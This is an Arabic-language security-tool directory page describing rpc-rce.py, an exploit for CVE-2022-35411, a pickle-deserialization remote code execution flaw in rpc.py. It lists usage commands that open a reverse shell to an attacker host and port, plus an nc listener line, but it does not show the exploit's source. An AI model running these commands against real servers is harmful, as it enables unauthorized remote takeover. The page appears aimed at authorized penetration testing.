Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
rpc-rce.py — استغلال لـ CVE-2022-35411 — ثغرة RCE غير مصادق عليها في rpc.py (<= 0.6.0) | Kitploit
أدوات/GitHubGitHub/cspanias/rpc-rce.py
توليد الحمولةتحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويباختبار الاختراقأداة الوصول عن بعد
GitHubcspanias/rpc-rce.py

rpc-rce.py

استغلال لـ CVE-2022-35411 — ثغرة RCE غير مصادق عليها في rpc.py (<= 0.6.0)

عرض المستودع
2منذ سنة واحدةلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

استغلال rpc.py للتنفيذ عن بعد (CVE-2022-35411)

هذا استغلال محدث ومحسن لـ CVE-2022-35411، يستهدف الإصدارات الضعيفة من rpc.py (<= 0.6.0).
يسمح بتنفيذ الأوامر عن بعد بدون مصادقة (RCE) عبر إلغاء تسلسل pickle في بايثون.

الاستغلال الأصلي بواسطة: Elias Hohl
المحسَّن بواسطة: x7331 لسهولة الاستخدام وقابلية النقل والأتمتة


ملخص الثغرة

تكمن الثغرة في الاستخدام غير الآمن لوحدة pickle في بايثون من قبل rpc.py، مما يسمح بحمولات مصممة لتنفيذ أوامر عشوائية بدون مصادقة.

  • معرف CVE: CVE-2022-35411
  • الإصدارات المتأثرة: rpc.py v0.4.2 – v0.6.0
  • نوع الاستغلال: تنفيذ الأوامر عن بعد بدون مصادقة (RCE)

التغييرات

  • ✅ التحول إلى argparse مع خيارات --lhost و --lport و --target و --dry-run
  • ✅ هيكل كود نظيف ومعياري
  • ✅ تسليم شل عكسي اختياري (TCP Bash)
  • ✅ حمولة اختبار curl (وضع آمن)
  • ✅ دعم التسجيل ومخرجات أنظف
  • ✅ إرشادات استخدام صحيحة عبر -h / --help
  • ✅ بيانات وصفية وتعليقات داخلية للوضوح

الاستخدام

مثال الشل العكسي

root@kitploit:~
python3 rpc-rce.py --lhost 10.10.14.1 --lport 9001

تشغيل تجريبي (بدون شل، فقط اختبار curl)

root@kitploit:~
python3 rpc-rce.py --lhost 10.10.14.1 --lport 9001 --dry-run

هدف مخصص (اختياري)

root@kitploit:~
python3 rpc-rce.py --lhost 10.10.14.1 --lport 9001 --target http://victim.internal:65432/sayhi

المتطلبات

  • بايثون 3.x
  • مكتبة requests (قم بتثبيتها باستخدام pip install requests)
  • مستمع على LHOST الخاص بك (مثلاً nc -lvnp 9001)
  • خادم rpc.py ضعيف قيد التشغيل

إشعار قانوني وأخلاقي

يتم توفير هذا الاستغلال لأغراض تعليمية واختبارية مصرح بها فقط. لا تستخدمه على أنظمة لا تملكها أو تفتقر إلى إذن صريح لاختبارها.

تنزيل الأداة